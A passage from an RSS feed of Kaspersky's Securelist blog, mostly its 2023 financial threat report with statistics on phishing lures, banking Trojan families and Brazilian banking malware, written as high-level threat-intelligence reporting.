  250. <li>Use comprehensive security solutions that enable you to build a flexible and efficient security system. This system should encompass robust endpoint protection, early detection and suppression of attacks regardless of their complexity, access to up-to-date data on global cyberattacks, and basic digital literacy training for your employees. We recommend our <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext___" target="_blank" rel="noopener">Kaspersky NEXT</a> suite of products for business protection as a solution that can be tailored to the needs and capabilities of any company size.</li>
  251. </ul>
  252. ]]></content:encoded>
  253. <wfw:commentRss>https://securelist.com/vulnerability-report-q1-2024/112554/feed/</wfw:commentRss>
  254. <slash:comments>0</slash:comments>
  255. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-scaled.jpg" width="2666" height="1500"><media:keywords>full</media:keywords></media:content>
  256. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-1024x576.jpg" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
  257. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  258. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  259. </item>
  260. <item>
  261. <title>Financial cyberthreats in 2023</title>
  262. <link>https://securelist.com/financial-threat-report-2023/112526/</link>
  263. <comments>https://securelist.com/financial-threat-report-2023/112526/#respond</comments>
  264. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
  265. <pubDate>Mon, 06 May 2024 10:00:31 +0000</pubDate>
  266. <category><![CDATA[Publications]]></category>
  267. <category><![CDATA[Emotet]]></category>
  268. <category><![CDATA[Financial malware]]></category>
  269. <category><![CDATA[Fraud]]></category>
  270. <category><![CDATA[Google Android]]></category>
  271. <category><![CDATA[Microsoft Windows]]></category>
  272. <category><![CDATA[Mobile Malware]]></category>
  273. <category><![CDATA[Phishing]]></category>
  274. <category><![CDATA[QakBot]]></category>
  275. <category><![CDATA[Trojan Banker]]></category>
  276. <category><![CDATA[ZeuS]]></category>
  277. <category><![CDATA[Financial threats]]></category>
  278. <category><![CDATA[Mobile threats]]></category>
  279. <category><![CDATA[Spam and Phishing]]></category>
  280. <category><![CDATA[Windows malware]]></category>
  281. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112526</guid>
  282.  
  283. <description><![CDATA[In this report, we share our insights into the 2023 trends and statistics on financial threats, such as phishing, PC and mobile banking malware.]]></description>
  284. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Money is what always attracts cybercriminals. A significant share of scam, phishing and malware attacks is about money. With <a href="https://www.statista.com/outlook/fmo/digital-payments/worldwide#transaction-value" target="_blank" rel="noopener">trillions of dollars</a> of digital payments made every year, it is no wonder that attackers target electronic wallets, online shopping accounts and other financial assets, inventing new techniques and reusing good old ones. Amid the current threat landscape, Kaspersky has conducted a comprehensive analysis of the financial risks, pinpointing key trends and providing recommendations to effectively mitigate risks and enhance security posture.</p>
  285. <h2 id="methodology">Methodology</h2>
  286. <p>In this report, we present an analysis of financial cyberthreats in 2023, focusing on banking Trojans and phishing pages that target online banking, shopping accounts, cryptocurrency wallets and other financial assets. To gain an understanding of the financial threat landscape, we analyzed anonymized data on malicious activities detected on the devices of Kaspersky security product users and consensually provided to us through the Kaspersky Security Network (KSN).</p>
  287. <h2 id="key-findings">Key findings</h2>
  288. <h3 id="phishing">Phishing</h3>
  289. <ul>
  290. <li>Financial phishing accounted for 27.32% of all phishing attacks on corporate users and 30.68% of phishing attacks on home users.</li>
  291. <li>Online shopping brands were the most popular lure, accounting for 41.65% of financial phishing attempts.</li>
  292. <li>PayPal phishing accounted for 54.78% of pages targeting electronic payment system users.</li>
  293. <li>Cryptocurrency phishing saw a 16% year-on-year increase in 2023, with 5.84 million detections compared to 5.04 million in 2022.</li>
  294. </ul>
  295. <h3 id="pc-malware">PC malware</h3>
  296. <ul>
  297. <li>The number of users affected by financial malware for PCs dropped by 11% from 2022.</li>
  298. <li>Ramnit and Zbot were the prevalent malware families, together targeting over 50% of affected users.</li>
  299. <li>Consumers remained the primary target of financial cyberthreats, accounting for 61.2% of attacks.</li>
  300. </ul>
  301. <h3 id="mobile-malware">Mobile malware</h3>
  302. <ul>
  303. <li>The number of Android users attacked by banking malware increased by 32% compared to the previous year.</li>
  304. <li>Agent was the most active mobile malware family, making up 38% of all Android attacks.</li>
  305. <li>Users in Turkey were the most targeted, with 2.98% encountering mobile banking malware.</li>
  306. </ul>
  307. <h2 id="financial-phishing">Financial phishing</h2>
  308. <p>In 2023, online fraudsters continued to lure users to phishing and scam pages that mimicked the websites of popular brands and financial organizations. The attackers employed social engineering techniques to trick victims into sharing their financial data or making a payment on a fake page.</p>
  309. <p>This year, we analyzed phishing detections separately for users of our home and business products. Among phishing and scam pages blocked on the devices of business users, 27.32% were financial phishing pages (pages mimicking online banks, payment systems and online stores). For fake pages blocked on home devices, this number was even higher at 30.68%.</p>
  310. <div class="js-infogram-embed" data-id="_/boYLMQpWpL1GXYlETIxb" data-type="interactive" data-title="01 EN Financial report graphs" style="min-height:;"></div>
  311. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 organizations mimicked by phishing and scam pages that were blocked on business users&#8217; devices, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082640/01-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  312. <div class="js-infogram-embed" data-id="_/3ZS8RqMMAvJhiI8jSaTS" data-type="interactive" data-title="02 EN Financial report graphs" style="min-height:;"></div>
  313. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 organizations mimicked by phishing and scam pages that were blocked on home users&#8217; devices, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082651/02-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  314. <p>Overall, among the three major financial phishing categories, online store users (41.65%) were targeted the most, followed by banks (38.47%) and payment systems (19.88%).</p>
  315. <div class="js-infogram-embed" data-id="_/G18VozQq8HHirkKRgi8i" data-type="interactive" data-title="03 EN Financial report graphs" style="min-height:;"></div>
  316. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of financial phishing pages by category, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082700/03-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  317. <h3 id="online-shopping-scams">Online shopping scams</h3>
  318. <p>Online stores were the most targeted category, comprising more than 40% (41.65%) of all financial phishing pages. Fraudsters impersonated popular online store websites, such as Amazon, eBay and Shopify, as well as brand websites and popular streaming services, such as Spotify and Netflix.</p>
  319. <div class="js-infogram-embed" data-id="_/BxtUdnoTTUPLTrkvt9aq" data-type="interactive" data-title="04 EN Financial report graphs" style="min-height:;"></div>
  320. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 online shopping brands mimicked by phishing and scam pages, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155936/04-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  321. <p>The most frequently impersonated e-commerce site was Amazon, which was mimicked in more than one third (34%) of all online store phishing attempts. Apple came in second with 18.66% of fraudulent pages, followed by Netflix, with 14.71%.</p>
  322. <div id="attachment_112529" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112529" class="size-large wp-image-112529" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-1024x1017.png" alt="Sample of a phishing site that impersonates Amazon" width="1024" height="1017" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-1024x1017.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-300x298.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-150x150.png 150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-768x763.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-352x350.png 352w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-740x735.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-282x280.png 282w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-800x794.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-50x50.png 50w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01.png 1423w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112529" class="wp-caption-text">Sample of a phishing site that impersonates Amazon</p></div>
  323. <p>The tenth most-copied site was the Latin American online market MercadoLibre, which was mimicked by 1.77% of phishing pages. Fake sites also frequently targeted Louis Vuitton (5.52%), Shopify (4.73%), Alibaba Group (3.17%), Spotify (3.14%), eBay (3.12%) and Luxottica (2.94%) users.</p>
  324. <div id="attachment_112530" style="width: 658px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112530" class="size-large wp-image-112530" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-648x1024.png" alt="Phishing pages impersonating AliExpress, Spotify and Louis Vuitton websites" width="648" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-648x1024.png 648w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-190x300.png 190w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-768x1213.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-973x1536.png 973w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-1297x2048.png 1297w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-222x350.png 222w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-633x1000.png 633w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-177x280.png 177w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-570x900.png 570w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02.png 1568w" sizes="(max-width: 648px) 100vw, 648px" /></a><p id="caption-attachment-112530" class="wp-caption-text">Phishing pages impersonating AliExpress, Spotify and Louis Vuitton websites</p></div>
  325. <p>One of the most common scam types targeting online shoppers consists of cybercriminals offering heavy discounts (which, of course, expire soon), special offers, early access to goods or entertainment, and other &#8220;bargains&#8221;. Both home users and businesses were targeted. For instance, in the screenshot below, a fake page is supposedly offering a bus at an attractive price. If the user attempts to buy the vehicle, they are prompted to log in with their eBay account, and the credentials are then stolen.</p>
  326. <div id="attachment_112531" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112531" class="size-large wp-image-112531" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1024x505.png" alt="Fake page offering a bus at a relatively low price" width="1024" height="505" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1024x505.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-300x148.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-768x378.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1536x757.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-710x350.png 710w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-740x365.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-568x280.png 568w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-800x394.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03.png 1810w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112531" class="wp-caption-text">Fake page offering a bus at a relatively low price</p></div>
  327. <p>Fraudsters use similar scams on social networks. For example, in the screenshot below, a fake Instagram store is offering Louis Vuitton products.</p>
  328. <div id="attachment_112532" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112532" class="size-large wp-image-112532" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-1024x760.png" alt="Fake Louis Vuitton store on Instagram" width="1024" height="760" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-1024x760.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-300x223.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-768x570.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-471x350.png 471w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-740x549.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-377x280.png 377w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-800x594.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04.png 1064w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112532" class="wp-caption-text">Fake Louis Vuitton store on Instagram</p></div>
  329. <p>As new, more secure authentication technologies appear, scammers find ways to evade these, too. The phishing page in the screenshot below, mimicking the Shopify sign-in form, implements a scenario for when the victim uses a <a href="https://help.shopify.com/en/manual/your-account/logging-in/passkeys" target="_blank" rel="noopener">passkey</a> as the authentication method. Passkeys can only be used on the websites and apps they were created for. To authorize <a href="https://developers.google.com/identity/passkeys" target="_blank" rel="noopener">passkey authentication</a>, the user has to unlock the device the passkey was issued for. That means passkeys are of no use to phishers. To trick users into choosing to authenticate with a manually entered one-time code instead, the fake page displays an error message.</p>
  330. <div id="attachment_112533" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112533" class="size-large wp-image-112533" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1024x554.png" alt="Fake Shopify page trying to bypass passkey authentication" width="1024" height="554" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1024x554.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-300x162.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-768x415.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1536x831.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-647x350.png 647w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-740x400.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-518x280.png 518w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-800x433.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05.png 1605w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112533" class="wp-caption-text">Fake Shopify page trying to bypass passkey authentication</p></div>
  331. <h3 id="payment-system-phishing">Payment system phishing</h3>
  332. <p>Payment systems were mimicked in 19.88% of financial phishing attacks detected and blocked by Kaspersky products in 2023.</p>
  333. <div class="js-infogram-embed" data-id="_/QDfxNNGdun3BJEfYfUly" data-type="interactive" data-title="05 EN Financial report graphs" style="min-height:;"></div>
  334. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 5 payment systems mimicked by phishing and scam pages (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160007/05-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  335. <p>Among these, PayPal (54.73%) was the one that received the most attention, with more than half of attacks using its image.</p>
  336. <div id="attachment_112534" style="width: 1012px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112534" class="size-large wp-image-112534" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-1002x1024.png" alt="Fake page targeting PayPal users" width="1002" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-1002x1024.png 1002w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-294x300.png 294w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-768x785.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-343x350.png 343w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-740x756.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-274x280.png 274w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-800x817.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-50x50.png 50w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06.png 1294w" sizes="(max-width: 1002px) 100vw, 1002px" /></a><p id="caption-attachment-112534" class="wp-caption-text">Fake page targeting PayPal users</p></div>
  337. <p>Other frequently mimicked payment systems included MasterCard (16.58%), Visa (8.43%), Interac (4.05%) and PayPay (2.96%). Notably, Visa and MasterCard are typically mimicked on fake payment pages linked to a variety of phishing and scam sites.</p>
  338. <h3 id="cryptocurrency-scams">Cryptocurrency scams</h3>
  339. <p>In 2023, the number of phishing and scam attacks relating to cryptocurrencies continued to grow. Kaspersky antiphishing technologies prevented 5 838 499 attempts to follow a cryptocurrency-themed phishing link, which is 16% more than in 2022. This may be due to the fact that the Bitcoin rate, after hitting rock bottom in 2022, started to climb again in 2023. With the price of the number-one cryptocurrency setting new records at the beginning of 2024, this trend can be expected to develop further.</p>
  340. <p>We have seen a number of different cryptocurrency-related schemes throughout the year. Scammers impersonated well-known cryptocurrency exchanges and offered coins in the name of major companies. Among the most notable schemes was a <a href="https://securelist.com/hot-and-cold-cryptowallet-phishing/110136/" target="_blank" rel="noopener">phishing campaign</a> that targeted hardware crypto cold wallets. This type of wallet, normally disconnected from the internet, is considered quite safe. However, under the guise of a crypto giveaway, the attackers tricked users into connecting their hardware wallets to a fake website.</p>
  341. <p>We have also seen crypto wallet phishing using well-known non-cryptocurrency brands as a lure. For example, a phishing website bearing the Apple logo and photos of Apple products invited users to get cryptocurrency called &#8220;AppleCoin&#8221;. Interestingly, a coin under that name does exist, but it has nothing to do with Apple Inc.</p>
  342. <div id="attachment_112535" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112535" class="size-large wp-image-112535" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1024x391.png" alt="Phishing website touting AppleCoin in the name of Apple Inc" width="1024" height="391" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1024x391.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-300x114.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-768x293.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1536x586.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-2048x781.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-918x350.png 918w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-740x282.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-734x280.png 734w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-800x305.png 800w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112535" class="wp-caption-text">Phishing website touting AppleCoin in the name of Apple Inc</p></div>
  343. <p>If the user believes that Apple has at last issued its own cryptocurrency and enters their wallet credentials, the scammers grab their funds.</p>
  344. <h2 id="pc-malware">PC malware</h2>
  345. <p>In 2023, the decline in the number of users affected by financial PC malware continued. Our data showed a decrease from 350,808 in 2022 to 312,453 in 2023, reflecting an 11% drop. This trend has persisted for the past few years, and there are several reasons for it. First, users increasingly prefer mobile banking and sign in to their online bank accounts on PCs less frequently than on smartphones. Second, although users may still store their banking credentials in browsers on their desktop computers, most of the notorious banking malware for PCs has been repurposed to deliver other malware, such as ransomware, to infected systems. Often, these banking Trojans are used in more sophisticated targeted attacks, which usually means they infect fewer users.</p>
  346. <div class="js-infogram-embed" data-id="_/2ZwjMzgN2sPpUkWc7Tkv" data-type="interactive" data-title="06 EN Financial report graphs" style="min-height:;"></div>
  347. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of unique users attacked by banking malware in 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160037/06-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  348. <p>As can be seen in the graph above, banking malware attacks spiked in March. This coincided with a fourfold increase in <a href="https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/#emotet" target="_blank" rel="noopener">Emotet</a>&#8217;s activity, which was its last large-scale campaign observed in 2023.</p>
  349. <h3 id="key-banking-malware-actors">Key banking malware actors</h3>
  350. <p>The notable strains of banking Trojans in 2023 included Ramnit (35.1%), Zbot (22.5%) and Emotet (16.2%), which remained the top three financial malware families for the PC. The percentages of all three grew compared to 2022, together comprising nearly three-quarters of all financial malware attacks on desktop computers.</p>
  351. <table width="100%">
  352. <tbody>
  353. <tr>
  354. <td width="25%"><strong>Name</strong></td>
  355. <td width="60%"><strong>Verdict</strong></td>
  356. <td width="15%"><strong>%*</strong></td>
  357. </tr>
  358. <tr>
  359. <td>Ramnit/Nimnul</td>
  360. <td>Trojan-Banker.Win32.Ramnit</td>
  361. <td>35.1</td>
  362. </tr>
  363. <tr>
  364. <td>Zbot/Zeus</td>
  365. <td>Trojan-Banker.Win32.Zbot</td>
  366. <td>22.5</td>
  367. </tr>
  368. <tr>
  369. <td>Emotet</td>
  370. <td>Trojan-Banker.Win32.Emotet</td>
  371. <td>16.2</td>
  372. </tr>
  373. <tr>
  374. <td>CliptoShuffler</td>
  375. <td>Trojan-Banker.Win32.CliptoShuffler</td>
  376. <td>6.9</td>
  377. </tr>
  378. <tr>
  379. <td>Danabot</td>
  380. <td>Trojan-Banker.Win32.Danabot</td>
  381. <td>2.2</td>
  382. </tr>
  383. <tr>
  384. <td>Tinba</td>
  385. <td>Trojan-Banker.Win32.Tinba</td>
  386. <td>2.1</td>
  387. </tr>
  388. <tr>
  389. <td>SpyEyes</td>
  390. <td>Trojan-Spy.Win32.SpyEye</td>
  391. <td>1.9</td>
  392. </tr>
  393. <tr>
  394. <td>Qbot/Qakbot</td>
  395. <td>Trojan-Banker.Win32.Qbot</td>
  396. <td>1.8</td>
  397. </tr>
  398. <tr>
  399. <td>BitStealer</td>
  400. <td>Trojan-Banker.Win32.BitStealer</td>
  401. <td>1.3</td>
  402. </tr>
  403. <tr>
  404. <td>IcedID</td>
  405. <td>Trojan-Banker.Win32.IcedID</td>
  406. <td>1.2</td>
  407. </tr>
  408. </tbody>
  409. </table>
  410. <p><em>* Unique users who encountered this malware family as a percentage of all users attacked by financial malware</em></p>
  411. <p>These three Trojans have a range of capabilities apart from stealing banking credentials. They can download additional modules and third-party malware, collect various types of data, such as passwords stored in browsers, and perform other malicious activities.</p>
  412. <p>Fourth and fifth were CliptoShuffler (6.9%) and Danabot (2.2%), both frequent entries in the rankings, and in sixth place was Tinba (2.2%), also known as &#8220;Tiny Banker Trojan&#8221;. Although we have not seen this family among the most active banking Trojans in previous years, it dates back to 2012, and its source code has been leaked. It is written in Assembler and gets its name from its remarkably small size.</p>
  413. <p>Among other most active banking malware types were SpyEyes (1.9%), <a href="https://securelist.com/qbot-banker-business-correspondence/109535/" target="_blank" rel="noopener">QakBot</a> (1.8%), BitStealer (1.3%) and IcedID (1.2%).</p>
  414. <h3 id="brazilian-malware">Brazilian malware</h3>
  415. <p>While the overall number of desktop financial malware attacks has steadily declined, we have observed a <a href="https://securelist.com/kaspersky-security-bulletin-crimeware-financial-threats-2024/111093/#resurgence-of-brazilian-banking-trojans" target="_blank" rel="noopener">trend</a> for Brazilian families attempting to fill the void. In the beginning of 2023, we shared insights into new functionality added to <a href="https://securelist.com/prilex-modification-now-targeting-contactless-credit-card-transactions/108569/" target="_blank" rel="noopener">Prilex</a>, a type of malware known to target ATMs and PoS (point of sale) terminals. Kaspersky experts found the new modification was specifically designed to exploit contactless payments. When someone tries to pay with a contactless card, the infected PoS terminal displays an error message, prompting the buyer to insert the card and thus helping attackers to capture sensitive payment details. Cybercriminals can then run unauthorized transactions and potentially steal large sums of money from unsuspecting victims.</p>
  416. <p>Another interesting malware strain is <a href="https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/#gopix" target="_blank" rel="noopener">GoPIX</a>, which targets the Brazilian instant payment system <a href="https://en.wikipedia.org/wiki/Pix_(payment_system)" target="_blank" rel="noopener">PIX</a>. It spreads by impersonating the WhatsApp web app. Once successfully installed, it starts monitoring clipboard contents. If the malware detects PIX transaction data in the clipboard, it replaces that data with data controlled by the attackers, tricking the user into transferring money to cybercriminals. It targets Bitcoin and Ethereum transactions in the same manner.</p>
  417. <p>Recently, our Global Research and Analysis Team (GReAT) discovered <a href="https://securelist.com/coyote-multi-stage-banking-trojan/111846/" target="_blank" rel="noopener">Coyote</a>, a new banking Trojan of Brazilian origin. Targeting more than 60 banking institutions, primarily in Brazil, this malware uses a sophisticated infection chain that utilizes various relatively new technologies. Spreading via the Squirrel installer, it leverages a NodeJS environment and the Nim programming language to complete infection. Coyote is capable of keylogging, taking screenshots, and setting up fake pages to steal user credentials.</p>
  418. <h3 id="geography-of-pc-banking-malware-attacks">Geography of PC banking malware attacks</h3>
  419. <p>To highlight the countries where financial malware was most prevalent in 2023, we calculated the share of users who encountered banking Trojans in the total number attacked by any type of malware in the country. The following statistics indicate where users are most likely to encounter financial malware.</p>
  420. <p>The highest share of banking Trojans was registered in Afghanistan (6%), Turkmenistan (5.2%) and Tajikistan (3.7%). Switzerland (3.2%) and Mauritania (3%) were also among the worst affected by this type of threat.</p>
